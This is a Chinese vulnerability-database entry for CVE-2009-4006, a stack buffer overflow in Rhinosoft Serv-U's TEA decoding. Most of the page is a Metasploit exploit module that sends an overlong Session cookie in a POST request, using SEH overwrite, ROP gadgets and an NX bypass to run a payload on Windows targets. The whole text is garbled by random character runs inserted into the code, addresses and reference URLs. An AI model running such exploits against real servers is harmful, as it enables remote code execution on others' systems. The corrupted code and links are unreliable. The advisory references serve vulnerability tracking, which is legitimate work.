Serv-U FTP服务器TEA解码算法栈缓冲区溢出漏洞

漏洞ID 1119080 漏洞类型 缓冲区错误
发布时间 2010-03-10 更新时间 2020-07-29
CVE编号 CVE-2009-4006

CNNVD-ID CNNVD-200911-216
漏洞平台 Windows CVSS5 0 k K D 4 T评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/16775
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200911-21b $ y X V6
|漏洞详情
Rh1 7 3inoSoft Serv-U FTP服务器7.0.0.1,9.0.0.5,以及其他9.1.0.0之前版本中的TEA解码算法中存在基于栈的缓冲区溢出漏洞。远程攻击者可借助超长的十六进制字符串执行任意代码。
|漏洞EXP
##
# $Id: servu_session_cookieu j Q c.rb 8762 2010-03-10 05:58:01Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and%  & ? commercial restrictions. Please see thex ` 8 y Q Metasploit
# Framework web si* S xte for more information on licensing and terms of use.
# http://metas# O m Cploit.com/framework/
##
require 'msf/core'
class Metasploit3 < M# B Wsf::Exploit:i H m ; t P 7 6 t:Remote
Rank = GoodR3 K  Jar y N ( ] Pnking
include Msf::Exploit::Remote::Tcp
inclY ] b 6 & y f cude Msf::Exploit::Remote::Seh
dw D 7ef initialize(info = {})
super* r I G(update_info(info,
'Name'           => 'Rhinosoft Serv-U Session Cookie Buffer Overflow',
'Description'    => %q{
This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5.
Sending a speci4 - ^ ) &ally craf_ s G , 7 D x N Jted POST request with an overly lok O V 9ng session cookie
string, an attacker may be able to execute arbitrary code.
},
'Author'         =>
[
M 3 j K l R E'Nikolas Rangos <nikolaos[at]rangos.de>j [ z ~ , r R;',
'M.Yanagishil c 8ta <megp 7 2 Z 0umi1990[at]gmail.com>',
'jduck'
],
'License'F o S # X H        => MSF_LICENSE,
'Version'        => '$Revision: 8762 ${ # a S 8',
'References'     =>
[
[ 'CVE', '2009-4006' ], # unsure
[ 'OSVDB', '59772' ],
[ 'URL', 'http://ra3 9 , @ & A Dngos.de/ServUZ e * r # w-ADV.txt' ],
[ 'URL',r ) , 'http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071w I A s 370.html' ],
],
'DefaultOptions'U n s h =>
{
'EXITFUNC' => 'thread',
},
'Privij 3 leged'     => true,
'Paylt + K V load'        =>
{
'Space'    => 512,
'BadChars' => "\xJ m ]00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:e M P i  b;-,/#.\\$%\x1a",
'StackAdjustment' => -4096,
},
'Platform'       => 'win',
'Targets'        =>
[
[ 'Windows 2003 SP2 English (NX)',
{
'FixESP'	=> 0x0fb02849, 	# add esp, 0x40c / ret 		@libeay32
'FixESI'	=> 0x78a31e96, 	# pop esi / ret			@mfc90u.dll
'FixEBP'	=> 0x78a4aY 2 N ^ L + %e9k r = R x S -9, 	# push esp| 2 r } y 3 / pop ebp / ret 0xc 	@mfc90u.dll
'Retg 6 O 3'		=> 0x78L D J ma3e987, 	# ret 0x20			@mfc90u.dll
'DisableNX'	=> 0x7c83f547,	#K D ! Z x O NX Disable			@ntdll.dll
'JmpESP'	=> 0x78b2| 4 y , 7 {c753	# jmp esp			@mfc90u.dll
}
],
[ 'Windows 2000 SP4 and XP SPw t w U e g & Z @3 English (SEH)',
{
'Ret'	=> 0x0fb870bd		# pop pop ret			@libeay32.dll
}
],
],
'DefauX v _ lltTarget'  => 1,
'Disclo] 7 :sureDate' => 'Nov 1 2009'))
register_options( [ OQ + ~ e [ ! p wpt::RPORT(80) ], self.class )
end
def check
connect
sock.put("\rB ; p C ^ 9 ~\n\r\n") # works
res = sock.get(-1,3)
disconnect
i/ i Q = 8 qf (re: N g _ ] W !s =~ /Server: Serv-U\/9\.0\.0\.5/)
return Exploit::K G e I s sCheckCode::Vulnerable
elsif (res =~ /Server: Serv-U/)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def explQ 0 [ ?oit
# hit end of stack..
sploit = Rex::Text.rand_text(1000) * 75
if ($ # N Z T 3target.name =~ /NX/)
# new SEH handler (point esp into buffer)
sploit[41000,4] = [target['FixESP']].pack('V'3 w L Z * _ X Q)
# st 8 ! - U d Gtack frame to bypass NX
sploit[52+0,4] = [target['FixESI']].pack('V')
sploit[52+4,4] = [0x10200].pack('V')
sploit[52+8,4] = [target['FixEBP']].pack('V')
sploit[52+12,4] = [target['Ret']].pack('Vg f 2')
sploit[52+16,4] = [target['JmpESP']].pack(& S j G E'V')
sploit[52+20,4] = [target['DisablX P zeNX']].pack('V')
sploit[52+24,2_ ^ U] = "\xeb\x20"
sploit[52+40,payload.encoded.length] = payload.encoded
else
seh = generate_seh_record(target.ret)
sploit[40996,seh.length] = seh
sploit[41004,payload.encoded.length] = payload.encoded
end
rF w X F C P Weq =  "POST / HTTP/1.1\r\n"
req << "Host: #{rhost}:#{rport}\r\n"
req << "Cookie: Session=_"
req << sploit.unpack('Q ~ o |H*Y n u D m S')[0]
req << "\r\n"
req << "\r\n";
connect
print_stak 9 ( i A &tus("Trying target #{target.name}..." % target['Ret'])
sock.put(req)
select(nil, nil, nil, 1.5)
handler
disconnect
end
end
|参考资料

来源:XF
名称:servu-tea-bo(54322)
链接:http://xforce.iss.net/xforce/xfdb/54322
来源:VUPEN
名称:| p o f j _ ] oADV-2009-3277
链接:http://www.vupen.com/english/advisories/2009/3277
来源:SECTRA4 ? 2CK
名称:1023199
链接:http://www.securitytracker.com/id?1023199
来源:BID
名称:37051
链接:http://www.secu? a o i ,rityfocus.com/bid/37051
来源:BUGTRAQ
Q 7 6 ; ] 2称:20091118Secun( 3 , B B X ) H CiaResearch:RhinoSoj - G n M qftServ-UTEADecodingBufferOverflow
链接:http://www.securityfocus.com/archive/1/archive/1/5079= s P G Z * 1 Z55/100/0/threaded
来源:H y o a | ) ) GMISC
链接:http:1 j r [//secunia.com/secunia_research/2009-46/